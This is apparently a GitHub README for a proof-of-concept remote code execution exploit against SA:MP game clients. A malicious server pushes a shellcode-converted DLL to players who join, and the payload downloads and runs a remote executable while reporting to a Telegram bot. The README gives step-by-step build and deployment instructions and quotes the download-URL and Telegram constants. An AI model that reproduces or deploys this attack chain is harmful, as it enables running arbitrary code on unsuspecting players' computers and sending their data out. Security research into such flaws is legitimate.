zile42O/samp-rce

samp-rce

A small demonstration example of remote code execution in SA:MP. This vulnerability is fixed in the latest RC, samp 0.3.7-R5.

Setup

  • Download the files (clone the repo)

  • Compile the src/ (C++) project to a .dll

    • src/ is just a small example that downloads the samp037r5 file and runs it, with a Telegram logger
    • Note: a prebuilt file named sampRCE.dll is already in the release/ directory, with a no-longer-working Telegram token (which I used for testing)

      Edit these lines in the main.h file:

      samp-rce/src/main.h

      Lines 10 to 16 in 7ee3ef9

      // Constants for Telegram API
      #define TELEGRAM_API_URL "https://api.telegram.org/bot"
      #define TELEGRAM_BOT_TOKEN "XXXXXXXXX:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"
      #define TELEGRAM_CHAT_ID "XXXXXXXXXXX"
      // Constants for downloading remote exe files
      #define DOWNLOAD_REMOTE_EXE "https://api.zile42o.dev/download/sa-mp-0.3.7-R5-1-install.exe" // for testing purposes

  • Rename the file, changing its extension from .dll to .asi

  • Move the file to the sRDI/ directory

  • Convert to shellcode

    py .\ConvertToShellcode.py .\sampRCE.asi
    
  • Move the converted sampRCE.asi to server/scriptfiles/

  • Run the server with sampctl run, join the game, and that's it

|----------|                   |---------|                                         |--------|
| samp svr | ---> [rce.pwn] -> | payload | <---> [ scriptfiles/sampRCE.asi ] ----> | client |
|----------|                   |---------|                                         |--------|

Demo images

Client: [image: demo1]

Telegram logger example: [image: demo2]

Credits

Big thanks to EvgeN 1137, who explained and covered this vulnerability; you can check his post here.

Disclaimer

This repository is for academic purposes; the use of this software is your responsibility.